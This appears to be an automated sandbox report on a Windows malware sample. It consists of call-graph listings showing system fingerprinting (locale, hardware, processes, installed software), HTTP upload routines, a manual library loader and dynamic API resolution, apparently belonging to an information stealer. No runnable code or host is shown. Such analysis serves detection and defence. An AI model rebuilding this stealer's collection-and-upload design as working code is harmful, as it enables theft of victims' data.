StrCmpCA 15014->15018 15019 41a820 lstrlen lstrcpy 15014->15019 15015->13788 15016->15014 15017->15014 15018->15014 15019->15014 15023 410f67 15020->15023 15021 411044 15021->13796 15022 410fb2 StrCmpCA 15022->15023 15023->15021 15023->15022 15024 41a820 lstrlen lstrcpy 15023->15024 15024->15023 15026 41a740 lstrcpy 15025->15026 15027 411a26 15026->15027 15028 41a9b0 4 API calls 15027->15028 15029 411a37 15028->15029 15030 41a8a0 lstrcpy 15029->15030 15031 411a40 15030->15031 15032 41a9b0 4 API calls 15031->15032 15033 411a5b 15032->15033 15034 41a8a0 lstrcpy 15033->15034 15035 411a64 15034->15035 15036 41a9b0 4 API calls 15035->15036 15037 411a7d 15036->15037 15038 41a8a0 lstrcpy 15037->15038 15039 411a86 15038->15039 15040 41a9b0 4 API calls 15039->15040 15041 411aa1 15040->15041 15042 41a8a0 lstrcpy 15041->15042 15043 411aaa 15042->15043 15044 41a9b0 4 API calls 15043->15044 15045 411ac3 15044->15045 15046 41a8a0 lstrcpy 15045->15046 15047 411acc 15046->15047 15048 41a9b0 4 API calls 15047->15048 15049 411ae7 15048->15049 15050 41a8a0 lstrcpy 15049->15050 15051 411af0 15050->15051 15052 41a9b0 4 API calls 15051->15052 15053 411b09 15052->15053 15054 41a8a0 lstrcpy 15053->15054 15055 411b12 15054->15055 15056 41a9b0 4 API calls 15055->15056 15057 411b2d 15056->15057 15058 41a8a0 lstrcpy 15057->15058 15059 411b36 15058->15059 15060 41a9b0 4 API calls 15059->15060 15061 411b4f 15060->15061 15062 41a8a0 lstrcpy 15061->15062 15063 411b58 15062->15063 15064 41a9b0 4 API calls 15063->15064 15065 411b76 15064->15065 15066 41a8a0 lstrcpy 15065->15066 15067 411b7f 15066->15067 15068 417500 6 API calls 15067->15068 15069 411b96 15068->15069 15070 41a920 3 API calls 15069->15070 15071 411ba9 15070->15071 15072 41a8a0 lstrcpy 15071->15072 15073 411bb2 15072->15073 15074 41a9b0 4 API calls 15073->15074 15075 411bdc 15074->15075 15076 41a8a0 lstrcpy 15075->15076 15077 411be5 15076->15077 15078 41a9b0 4 API calls 15077->15078 15079 411c05 15078->15079 15080 41a8a0 lstrcpy 15079->15080 15081 411c0e 15080->15081 15789 417690 GetProcessHeap RtlAllocateHeap 15081->15789 15084 41a9b0 4 API calls 15085 411c2e 15084->15085 15086 41a8a0 lstrcpy 15085->15086 15087 411c37 15086->15087 15088 41a9b0 4 API calls 15087->15088 15089 411c56 15088->15089 15090 41a8a0 lstrcpy 15089->15090 15091 411c5f 15090->15091 15092 41a9b0 4 API calls 15091->15092 15093 411c80 15092->15093 15094 41a8a0 lstrcpy 15093->15094 15095 411c89 15094->15095 15796 4177c0 GetCurrentProcess IsWow64Process 15095->15796 15098 41a9b0 4 API calls 15099 411ca9 15098->15099 15100 41a8a0 lstrcpy 15099->15100 15101 411cb2 15100->15101 15102 41a9b0 4 API calls 15101->15102 15103 411cd1 15102->15103 15104 41a8a0 lstrcpy 15103->15104 15105 411cda 15104->15105 15106 41a9b0 4 API calls 15105->15106 15107 411cfb 15106->15107 15108 41a8a0 lstrcpy 15107->15108 15109 411d04 15108->15109 15110 417850 3 API calls 15109->15110 15111 411d14 15110->15111 15112 41a9b0 4 API calls 15111->15112 15113 411d24 15112->15113 15114 41a8a0 lstrcpy 15113->15114 15115 411d2d 15114->15115 15116 41a9b0 4 API calls 15115->15116 15117 411d4c 15116->15117 15118 41a8a0 lstrcpy 15117->15118 15119 411d55 15118->15119 15120 41a9b0 4 API calls 15119->15120 15121 411d75 15120->15121 15122 41a8a0 lstrcpy 15121->15122 15123 411d7e 15122->15123 15124 4178e0 3 API calls 15123->15124 15125 411d8e 15124->15125 15126 41a9b0 4 API calls 15125->15126 15127 411d9e 15126->15127 15128 41a8a0 lstrcpy 15127->15128 15129 411da7 15128->15129 15130 41a9b0 4 API calls 15129->15130 15131 411dc6 15130->15131 15132 41a8a0 lstrcpy 15131->15132 15133 411dcf 15132->15133 15134 41a9b0 4 API calls 15133->15134 15135 411df0 15134->15135 15136 41a8a0 lstrcpy 15135->15136 15137 411df9 15136->15137 15798 417980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15137->15798 15140 41a9b0 4 API calls 15141 411e19 15140->15141 15142 41a8a0 lstrcpy 15141->15142 15143 411e22 15142->15143 15144 41a9b0 4 API calls 15143->15144 15145 411e41 15144->15145 15146 41a8a0 lstrcpy 15145->15146 15147 411e4a 15146->15147 15148 41a9b0 4 API calls 15147->15148 15149 411e6b 15148->15149 15150 41a8a0 lstrcpy 15149->15150 15151 411e74 15150->15151 15800 417a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15151->15800 15154 41a9b0 4 API calls 15155 411e94 15154->15155 15156 41a8a0 lstrcpy 15155->15156 15157 411e9d 15156->15157 15158 41a9b0 4 API calls 15157->15158 15159 411ebc 15158->15159 15160 41a8a0 lstrcpy 15159->15160 15161 411ec5 15160->15161 15162 41a9b0 4 API calls 15161->15162 15163 411ee5 15162->15163 15164 41a8a0 lstrcpy 15163->15164 15165 411eee 15164->15165 15803 417b00 GetUserDefaultLocaleName 15165->15803 15168 41a9b0 4 API calls 15169 411f0e 15168->15169 15170 41a8a0 lstrcpy 15169->15170 15171 411f17 15170->15171 15172 41a9b0 4 API calls 15171->15172 15173 411f36 15172->15173 15174 41a8a0 lstrcpy 15173->15174 15175 411f3f 15174->15175 15176 41a9b0 4 API calls 15175->15176 15177 411f60 15176->15177 15178 41a8a0 lstrcpy 15177->15178 15179 411f69 15178->15179 15807 417b90 15179->15807 15181 411f80 15182 41a920 3 API calls 15181->15182 15183 411f93 15182->15183 15184 41a8a0 lstrcpy 15183->15184 15185 411f9c 15184->15185 15186 41a9b0 4 API calls 15185->15186 15187 411fc6 15186->15187 15188 41a8a0 lstrcpy 15187->15188 15189 411fcf 15188->15189 15190 41a9b0 4 API calls 15189->15190 15191 411fef 15190->15191 15192 41a8a0 lstrcpy 15191->15192 15193 411ff8 15192->15193 15819 417d80 GetSystemPowerStatus 15193->15819 15196 41a9b0 4 API calls 15197 412018 15196->15197 15198 41a8a0 lstrcpy 15197->15198 15199 412021 15198->15199 15200 41a9b0 4 API calls 15199->15200 15201 412040 15200->15201 15202 41a8a0 lstrcpy 15201->15202 15203 412049 15202->15203 15204 41a9b0 4 API calls 15203->15204 15205 41206a 15204->15205 15206 41a8a0 lstrcpy 15205->15206 15207 412073 15206->15207 15208 41207e GetCurrentProcessId 15207->15208 15821 419470 OpenProcess 15208->15821 15211 41a920 3 API calls 15212 4120a4 15211->15212 15213 41a8a0 lstrcpy 15212->15213 15214 4120ad 15213->15214 15215 41a9b0 4 API calls 15214->15215 15216 4120d7 15215->15216 15217 41a8a0 lstrcpy 15216->15217 15218 4120e0 15217->15218 15219 41a9b0 4 API calls 15218->15219 15220 412100 15219->15220 15221 41a8a0 lstrcpy 15220->15221 15222 412109 15221->15222 15826 417e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15222->15826 15225 41a9b0 4 API calls 15226 412129 15225->15226 15227 41a8a0 lstrcpy 15226->15227 15228 412132 15227->15228 15229 41a9b0 4 API calls 15228->15229 15230 412151 15229->15230 15231 41a8a0 lstrcpy 15230->15231 15232 41215a 15231->15232 15233 41a9b0 4 API calls 15232->15233 15234 41217b 15233->15234 15235 41a8a0 lstrcpy 15234->15235 15236 412184 15235->15236 15830 417f60 15236->15830 15239 41a9b0 4 API calls 15240 4121a4 15239->15240 15241 41a8a0 lstrcpy 15240->15241 15242 4121ad 15241->15242 15243 41a9b0 4 API calls 15242->15243 15244 4121cc 15243->15244 15245 41a8a0 lstrcpy 15244->15245 15246 4121d5 15245->15246 15247 41a9b0 4 API calls 15246->15247 15248 4121f6 15247->15248 15249 41a8a0 lstrcpy 15248->15249 15250 4121ff 15249->15250 15843 417ed0 GetSystemInfo wsprintfA 15250->15843 15253 41a9b0 4 API calls 15254 41221f 15253->15254 15255 41a8a0 lstrcpy 15254->15255 15256 412228 15255->15256 15257 41a9b0 4 API calls 15256->15257 15258 412247 15257->15258 15259 41a8a0 lstrcpy 15258->15259 15260 412250 15259->15260 15261 41a9b0 4 API calls 15260->15261 15262 412270 15261->15262 15263 41a8a0 lstrcpy 15262->15263 15264 412279 15263->15264 15845 418100 GetProcessHeap RtlAllocateHeap 15264->15845 15267 41a9b0 4 API calls 15268 412299 15267->15268 15269 41a8a0 lstrcpy 15268->15269 15270 4122a2 15269->15270 15271 41a9b0 4 API calls 15270->15271 15272 4122c1 15271->15272 15273 41a8a0 lstrcpy 15272->15273 15274 4122ca 15273->15274 15275 41a9b0 4 API calls 15274->15275 15276 4122eb 15275->15276 15277 41a8a0 lstrcpy 15276->15277 15278 4122f4 15277->15278 15851 4187c0 15278->15851 15281 41a920 3 API calls 15282 41231e 15281->15282 15283 41a8a0 lstrcpy 15282->15283 15284 412327 15283->15284 15285 41a9b0 4 API calls 15284->15285 15286 412351 15285->15286 15287 41a8a0 lstrcpy 15286->15287 15288 41235a 15287->15288 15289 41a9b0 4 API calls 15288->15289 15290 41237a 15289->15290 15291 41a8a0 lstrcpy 15290->15291 15292 412383 15291->15292 15293 41a9b0 4 API calls 15292->15293 15294 4123a2 15293->15294 15295 41a8a0 lstrcpy 15294->15295 15296 4123ab 15295->15296 15856 4181f0 15296->15856 15298 4123c2 15299 41a920 3 API calls 15298->15299 15300 4123d5 15299->15300 15301 41a8a0 lstrcpy 15300->15301 15302 4123de 15301->15302 15303 41a9b0 4 API calls 15302->15303 15304 41240a 15303->15304 15305 41a8a0 lstrcpy 15304->15305 15306 412413 15305->15306 15307 41a9b0 4 API calls 15306->15307 15308 412432 15307->15308 15309 41a8a0 lstrcpy 15308->15309 15310 41243b 15309->15310 15311 41a9b0 4 API calls 15310->15311 15312 41245c 15311->15312 15313 41a8a0 lstrcpy 15312->15313 15314 412465 15313->15314 15315 41a9b0 4 API calls 15314->15315 15316 412484 15315->15316 15317 41a8a0 lstrcpy 15316->15317 15318 41248d 15317->15318 15319 41a9b0 4 API calls 15318->15319 15320 4124ae 15319->15320 15321 41a8a0 lstrcpy 15320->15321 15322 4124b7 15321->15322 15864 418320 15322->15864 15324 4124d3 15325 41a920 3 API calls 15324->15325 15326 4124e6 15325->15326 15327 41a8a0 lstrcpy 15326->15327 15328 4124ef 15327->15328 15329 41a9b0 4 API calls 15328->15329 15330 412519 15329->15330 15331 41a8a0 lstrcpy 15330->15331 15332 412522 15331->15332 15333 41a9b0 4 API calls 15332->15333 15334 412543 15333->15334 15335 41a8a0 lstrcpy 15334->15335 15336 41254c 15335->15336 15337 418320 17 API calls 15336->15337 15338 412568 15337->15338 15339 41a920 3 API calls 15338->15339 15340 41257b 15339->15340 15341 41a8a0 lstrcpy 15340->15341 15342 412584 15341->15342 15343 41a9b0 4 API calls 15342->15343 15344 4125ae 15343->15344 15345 41a8a0 lstrcpy 15344->15345 15346 4125b7 15345->15346 15347 41a9b0 4 API calls 15346->15347 15348 4125d6 15347->15348 15349 41a8a0 lstrcpy 15348->15349 15350 4125df 15349->15350 15351 41a9b0 4 API calls 15350->15351 15352 412600 15351->15352 15353 41a8a0 lstrcpy 15352->15353 15354 412609 15353->15354 15900 418680 15354->15900 15356 412620 15357 41a920 3 API calls 15356->15357 15358 412633 15357->15358 15359 41a8a0 lstrcpy 15358->15359 15360 41263c 15359->15360 15361 41265a lstrlen 15360->15361 15362 41266a 15361->15362 15363 41a740 lstrcpy 15362->15363 15364 41267c 15363->15364 15365 401590 lstrcpy 15364->15365 15366 41268d 15365->15366 15910 415190 15366->15910 15368 412699 15368->13800 16098 41aad0 15369->16098 15371 405009 InternetOpenUrlA 15375 405021 15371->15375 15372 4050a0 InternetCloseHandle InternetCloseHandle 15374 4050ec 15372->15374 15373 40502a InternetReadFile 15373->15375 15374->13804 15375->15372 15375->15373 16099 4098d0 15376->16099 15378 410759 15379 410a38 15378->15379 15380 41077d 15378->15380 15381 401590 lstrcpy 15379->15381 15383 410799 StrCmpCA 15380->15383 15382 410a49 15381->15382 16275 410250 15382->16275 15385 410843 15383->15385 15386 4107a8 15383->15386 15389 410865 StrCmpCA 15385->15389 15388 41a7a0 lstrcpy 15386->15388 15390 4107c3 15388->15390 15391 410874 15389->15391 15428 41096b 15389->15428 15392 401590 lstrcpy 15390->15392 15393 41a740 lstrcpy 15391->15393 15394 41080c 15392->15394 15396 410881 15393->15396 15397 41a7a0 lstrcpy 15394->15397 15395 41099c StrCmpCA 15398 4109ab 15395->15398 15417 410a2d 15395->15417 15399 41a9b0 4 API calls 15396->15399 15400 410823 15397->15400 15401 401590 lstrcpy 15398->15401 15402 4108ac 15399->15402 15403 41a7a0 lstrcpy 15400->15403 15405 4109f4 15401->15405 15406 41a920 3 API calls 15402->15406 15404 41083e 15403->15404 16102 40fb00 15404->16102 15408 41a7a0 lstrcpy 15405->15408 15409 4108b3 15406->15409 15410 410a0d 15408->15410 15411 41a9b0 4 API calls 15409->15411 15412 41a7a0 lstrcpy 15410->15412 15413 4108ba 15411->15413 15414 410a28 15412->15414 15415 41a8a0 lstrcpy 15413->15415 16218 410030 15414->16218 15417->13808 15428->15395 15750 41a7a0 lstrcpy 15749->15750 15751 401683 15750->15751 15752 41a7a0 lstrcpy 15751->15752 15753 401695 15752->15753 15754 41a7a0 lstrcpy 15753->15754 15755 4016a7 15754->15755 15756 41a7a0 lstrcpy 15755->15756 15757 4015a3 15756->15757 15757->14631 15759 4047c6 15758->15759 15760 404838 lstrlen 15759->15760 15784 41aad0 15760->15784 15762 404848 InternetCrackUrlA 15763 404867 15762->15763 15763->14708 15765 41a740 lstrcpy 15764->15765 15766 418b74 15765->15766 15767 41a740 lstrcpy 15766->15767 15768 418b82 GetSystemTime 15767->15768 15770 418b99 15768->15770 15769 41a7a0 lstrcpy 15771 418bfc 15769->15771 15770->15769 15771->14723 15773 41a931 15772->15773 15774 41a988 15773->15774 15776 41a968 lstrcpy lstrcat 15773->15776 15775 41a7a0 lstrcpy 15774->15775 15777 41a994 15775->15777 15776->15774 15777->14726 15778->14841 15780 409af9 LocalAlloc 15779->15780 15781 404eee 15779->15781 15780->15781 15782 409b14 CryptStringToBinaryA 15780->15782 15781->14729 15781->14732 15782->15781 15783 409b39 LocalFree 15782->15783 15783->15781 15784->15762 15785->14851 15786->14992 15787->14994 15788->15002 15917 4177a0 15789->15917 15792 4176c6 RegOpenKeyExA 15794 417704 RegCloseKey 15792->15794 15795 4176e7 RegQueryValueExA 15792->15795 15793 411c1e 15793->15084 15794->15793 15795->15794 15797 411c99 15796->15797 15797->15098 15799 411e09 15798->15799 15799->15140 15801 411e84 15800->15801 15802 417a9a wsprintfA 15800->15802 15801->15154 15802->15801 15804 411efe 15803->15804 15805 417b4d 15803->15805 15804->15168 15924 418d20 LocalAlloc CharToOemW 15805->15924 15808 41a740 lstrcpy 15807->15808 15809 417bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15808->15809 15812 417c25 15809->15812 15810 417c46 GetLocaleInfoA 15810->15812 15811 417d18 15813 417d28 15811->15813 15814 417d1e LocalFree 15811->15814 15812->15810 15812->15811 15815 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15812->15815 15818 41a8a0 lstrcpy 15812->15818 15816 41a7a0 lstrcpy 15813->15816 15814->15813 15815->15812 15817 417d37 15816->15817 15817->15181 15818->15812 15820 412008 15819->15820 15820->15196 15822 419493 GetModuleFileNameExA CloseHandle 15821->15822 15823 4194b5 15821->15823 15822->15823 15824 41a740 lstrcpy 15823->15824 15825 412091 15824->15825 15825->15211 15827 412119 15826->15827 15828 417e68 RegQueryValueExA 15826->15828 15827->15225 15829 417e8e RegCloseKey 15828->15829 15829->15827 15831 417fb9 GetLogicalProcessorInformationEx 15830->15831 15832 417fd8 GetLastError 15831->15832 15839 418029 15831->15839 15835 418022 15832->15835 15842 417fe3 15832->15842 15836 412194 15835->15836 15838 4189f0 2 API calls 15835->15838 15836->15239 15837 4189f0 2 API calls 15840 41807b 15837->15840 15838->15836 15839->15837 15840->15835 15841 418084 wsprintfA 15840->15841 15841->15836 15842->15831 15842->15836 15925 4189f0 15842->15925 15928 418a10 GetProcessHeap RtlAllocateHeap 15842->15928 15844 41220f 15843->15844 15844->15253 15846 4189b0 15845->15846 15847 41814d GlobalMemoryStatusEx 15846->15847 15850 418163 __aulldiv 15847->15850 15848 41819b wsprintfA 15849 412289 15848->15849 15849->15267 15850->15848 15852 4187fb GetProcessHeap RtlAllocateHeap wsprintfA 15851->15852 15854 41a740 lstrcpy 15852->15854 15855 41230b 15854->15855 15855->15281 15857 41a740 lstrcpy 15856->15857 15861 418229 15857->15861 15858 418263 15860 41a7a0 lstrcpy 15858->15860 15859 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15859->15861 15862 4182dc 15860->15862 15861->15858 15861->15859 15863 41a8a0 lstrcpy 15861->15863 15862->15298 15863->15861 15865 41a740 lstrcpy 15864->15865 15866 41835c RegOpenKeyExA 15865->15866 15867 4183d0 15866->15867 15868 4183ae 15866->15868 15870 418613 RegCloseKey 15867->15870 15871 4183f8 RegEnumKeyExA 15867->15871 15869 41a7a0 lstrcpy 15868->15869 15881 4183bd 15869->15881 15874 41a7a0 lstrcpy 15870->15874 15872 41843f wsprintfA RegOpenKeyExA 15871->15872 15873 41860e 15871->15873 15875 4184c1 RegQueryValueExA 15872->15875 15876 418485 RegCloseKey RegCloseKey 15872->15876 15873->15870 15874->15881 15878 418601 RegCloseKey 15875->15878 15879 4184fa lstrlen 15875->15879 15877 41a7a0 lstrcpy 15876->15877 15877->15881 15878->15873 15879->15878 15880 418510 15879->15880 15882 41a9b0 4 API calls 15880->15882 15881->15324 15883 418527 15882->15883 15884 41a8a0 lstrcpy 15883->15884 15885 418533 15884->15885 15886 41a9b0 4 API calls 15885->15886 15887 418557 15886->15887 15888 41a8a0 lstrcpy 15887->15888 15889 418563 15888->15889 15890 41856e RegQueryValueExA 15889->15890 15890->15878 15891 4185a3 15890->15891 15892 41a9b0 4 API calls 15891->15892 15893 4185ba 15892->15893 15894 41a8a0 lstrcpy 15893->15894 15895 4185c6 15894->15895 15896 41a9b0 4 API calls 15895->15896 15897 4185ea 15896->15897 15898 41a8a0 lstrcpy 15897->15898 15899 4185f6 15898->15899 15899->15878 15901 41a740 lstrcpy 15900->15901 15902 4186bc CreateToolhelp32Snapshot Process32First 15901->15902 15903 4186e8 Process32Next 15902->15903 15904 41875d CloseHandle 15902->15904 15903->15904 15909 4186fd 15903->15909 15905 41a7a0 lstrcpy 15904->15905 15908 418776 15905->15908 15906 41a9b0 lstrcpy lstrlen lstrcpy lstrcat 15906->15909 15907 41a8a0 lstrcpy 15907->15909 15908->15356 15909->15903 15909->15906 15909->15907 15911 41a7a0 lstrcpy 15910->15911 15912 4151b5 15911->15912 15913 401590 lstrcpy 15912->15913 15914 4151c6 15913->15914 15929 405100 15914->15929 15916 4151cf 15916->15368 15920 417720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15917->15920 15919 4176b9 15919->15792 15919->15793 15921 417780 RegCloseKey 15920->15921 15922 417765 RegQueryValueExA 15920->15922 15923 417793 15921->15923 15922->15921 15923->15919 15924->15804 15926 4189f9 GetProcessHeap HeapFree 15925->15926 15927 418a0c 15925->15927 15926->15927 15927->15842 15928->15842 15930 41a7a0 lstrcpy 15929->15930 15931 405119 15930->15931 15932 4047b0 2 API calls 15931->15932 15933 405125 15932->15933 16089 418ea0 15933->16089 15935 405184 15936 405192 lstrlen 15935->15936 15937 4051a5 15936->15937 15938 418ea0 4 API calls 15937->15938 15939 4051b6 15938->15939 15940 41a740 lstrcpy 15939->15940 15941 4051c9 15940->15941 15942 41a740 lstrcpy 15941->15942 15943 4051d6 15942->15943 15944 41a740 lstrcpy 15943->15944 15945 4051e3 15944->15945 15946 41a740 lstrcpy 15945->15946 15947 4051f0 15946->15947 15948 41a740 lstrcpy 15947->15948 15949 4051fd InternetOpenA StrCmpCA 15948->15949 15950 40522f 15949->15950 15951 4058c4 InternetCloseHandle 15950->15951 15952 418b60 3 API calls 15950->15952 15958 4058d9 codecvt 15951->15958 15953 40524e 15952->15953 15954 41a920 3 API calls 15953->15954 15955 405261 15954->15955 15956 41a8a0 lstrcpy 15955->15956 15957 40526a 15956->15957 15959 41a9b0 4 API calls 15957->15959 15962 41a7a0 lstrcpy 15958->15962 15960 4052ab 15959->15960 15961 41a920 3 API calls 15960->15961 15963 4052b2 15961->15963 15969 405913 15962->15969 15964 41a9b0 4 API calls 15963->15964 15965 4052b9 15964->15965 15966 41a8a0 lstrcpy 15965->15966 15967 4052c2 15966->15967 15968 41a9b0 4 API calls 15967->15968 15970 405303 15968->15970 15969->15916 15971 41a920 3 API calls 15970->15971 15972 40530a 15971->15972 15973 41a8a0 lstrcpy 15972->15973 15974 405313 15973->15974 15975 405329 InternetConnectA 15974->15975 15975->15951 15976 405359 HttpOpenRequestA 15975->15976 15978 4058b7 InternetCloseHandle 15976->15978 15979 4053b7 15976->15979 15978->15951 15980 41a9b0 4 API calls 15979->15980 15981 4053cb 15980->15981 15982 41a8a0 lstrcpy 15981->15982 15983 4053d4 15982->15983 15984 41a920 3 API calls 15983->15984 15985 4053f2 15984->15985 15986 41a8a0 lstrcpy 15985->15986 15987 4053fb 15986->15987 15988 41a9b0 4 API calls 15987->15988 15989 40541a 15988->15989 15990 41a8a0 lstrcpy 15989->15990 15991 405423 15990->15991 15992 41a9b0 4 API calls 15991->15992 15993 405444 15992->15993 15994 41a8a0 lstrcpy 15993->15994 15995 40544d 15994->15995 15996 41a9b0 4 API calls 15995->15996 15997 40546e 15996->15997 16090 418ead CryptBinaryToStringA 16089->16090 16094 418ea9 16089->16094 16091 418ece GetProcessHeap RtlAllocateHeap 16090->16091 16090->16094 16092 418ef4 codecvt 16091->16092 16091->16094 16093 418f05 CryptBinaryToStringA 16092->16093 16093->16094 16094->15935 16098->15371 16341 409880 16099->16341 16101 4098e1 16101->15378 16103 41a740 lstrcpy 16102->16103 16276 41a740 lstrcpy 16275->16276 16277 410266 16276->16277 16278 418de0 2 API calls 16277->16278 16279 41027b 16278->16279 16280 41a920 3 API calls 16279->16280 16281 41028b 16280->16281 16282 41a8a0 lstrcpy 16281->16282 16283 410294 16282->16283 16284 41a9b0 4 API calls 16283->16284 16342 40988e 16341->16342 16345 406fb0 16342->16345 16344 4098ad codecvt 16344->16101 16348 406d40 16345->16348 16349 406d63 16348->16349 16362 406d59 16348->16362 16364 406530 16349->16364 16353 406dbe 16353->16362 16374 4069b0 16353->16374 16355 406e2a 16356 406ee6 VirtualFree 16355->16356 16358 406ef7 16355->16358 16355->16362 16356->16358 16357 406f41 16361 4189f0 2 API calls 16357->16361 16357->16362 16358->16357 16359 406f26 FreeLibrary 16358->16359 16360 406f38 16358->16360 16359->16358 16363 4189f0 2 API calls 16360->16363 16361->16362 16362->16344 16363->16357 16365 406542 16364->16365 16367 406549 16365->16367 16384 418a10 GetProcessHeap RtlAllocateHeap 16365->16384 16367->16362 16368 406660 16367->16368 16373 40668f VirtualAlloc 16368->16373 16370 406730 16371 406743 VirtualAlloc 16370->16371 16372 40673c 16370->16372 16371->16372 16372->16353 16373->16370 16373->16372 16375 4069c9 16374->16375 16379 4069d5 16374->16379 16376 406a09 LoadLibraryA 16375->16376 16375->16379 16377 406a32 16376->16377 16376->16379 16382 406ae0 16377->16382 16385 418a10 GetProcessHeap RtlAllocateHeap 16377->16385 16379->16355 16380 406ba8 GetProcAddress 16380->16379 16380->16382 16381 4189f0 2 API calls 16381->16382 16382->16379 16382->16380 16383 406a8b 16383->16379 16383->16381 16384->16367 16385->16383

                          Executed Functions

                          Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 419860-419874 call 419750 663 419a93-419af2 LoadLibraryA * 5 660->663 664 41987a-419a8e call 419780 GetProcAddress * 21 660->664 666 419af4-419b08 GetProcAddress 663->666 667 419b0d-419b14 663->667 664->663 666->667 668 419b46-419b4d 667->668 669 419b16-419b41 GetProcAddress * 2 667->669 671 419b68-419b6f 668->671 672 419b4f-419b63 GetProcAddress 668->672 669->668 673 419b71-419b84 GetProcAddress 671->673 674 419b89-419b90 671->674 672->671 673->674 675 419bc1-419bc2 674->675 676 419b92-419bbc GetProcAddress * 2 674->676 676->675
                          APIs
                          • GetProcAddress.KERNEL32(75900000,01280630), ref: 004198A1
                          • GetProcAddress.KERNEL32(75900000,01280798), ref: 004198BA
                          • GetProcAddress.KERNEL32(75900000,01280678), ref: 004198D2
                          • GetProcAddress.KERNEL32(75900000,012806D8), ref: 004198EA
                          • GetProcAddress.KERNEL32(75900000,012805E8), ref: 00419903
                          • GetProcAddress.KERNEL32(75900000,012889B0), ref: 0041991B
                          • GetProcAddress.KERNEL32(75900000,012766C0), ref: 00419933
                          • GetProcAddress.KERNEL32(75900000,01276680), ref: 0041994C
                          • GetProcAddress.KERNEL32(75900000,01280828), ref: 00419964
                          • GetProcAddress.KERNEL32(75900000,01280618), ref: 0041997C
                          • GetProcAddress.KERNEL32(75900000,01280840), ref: 00419995
                          • GetProcAddress.KERNEL32(75900000,01280600), ref: 004199AD
                          • GetProcAddress.KERNEL32(75900000,012767C0), ref: 004199C5
                          • GetProcAddress.KERNEL32(75900000,01280558), ref: 004199DE
                          • GetProcAddress.KERNEL32(75900000,012807B0), ref: 004199F6
                          • GetProcAddress.KERNEL32(75900000,01276740), ref: 00419A0E
                          • GetProcAddress.KERNEL32(75900000,01280648), ref: 00419A27
                          • GetProcAddress.KERNEL32(75900000,01280660), ref: 00419A3F
                          • GetProcAddress.KERNEL32(75900000,01276840), ref: 00419A57
                          • GetProcAddress.KERNEL32(75900000,01280690), ref: 00419A70
                          • GetProcAddress.KERNEL32(75900000,01276860), ref: 00419A88
                          • LoadLibraryA.KERNEL32(012806F0,?,00416A00), ref: 00419A9A
                          • LoadLibraryA.KERNEL32(012806A8,?,00416A00), ref: 00419AAB
                          • LoadLibraryA.KERNEL32(01280720,?,00416A00), ref: 00419ABD
                          • LoadLibraryA.KERNEL32(012806C0,?,00416A00), ref: 00419ACF
                          • LoadLibraryA.KERNEL32(01280768,?,00416A00), ref: 00419AE0
                          • GetProcAddress.KERNEL32(75070000,01280738), ref: 00419B02
                          • GetProcAddress.KERNEL32(75FD0000,012807C8), ref: 00419B23
                          • GetProcAddress.KERNEL32(75FD0000,01288D90), ref: 00419B3B
                          • GetProcAddress.KERNEL32(75A50000,01288EB0), ref: 00419B5D
                          • GetProcAddress.KERNEL32(74E50000,01276700), ref: 00419B7E
                          • GetProcAddress.KERNEL32(76E80000,012887F0), ref: 00419B9F
                          • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00419BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: NtQueryInformationProcess
                          • API String ID: 2238633743-2781105232
                          • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                          • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                          • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                          • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                          Function 004045C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 764 4045c0-404695 RtlAllocateHeap 781 4046a0-4046a6 764->781 782 4046ac-40474a 781->782 783 40474f-4047a9 VirtualProtect 781->783 782->781
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040460F
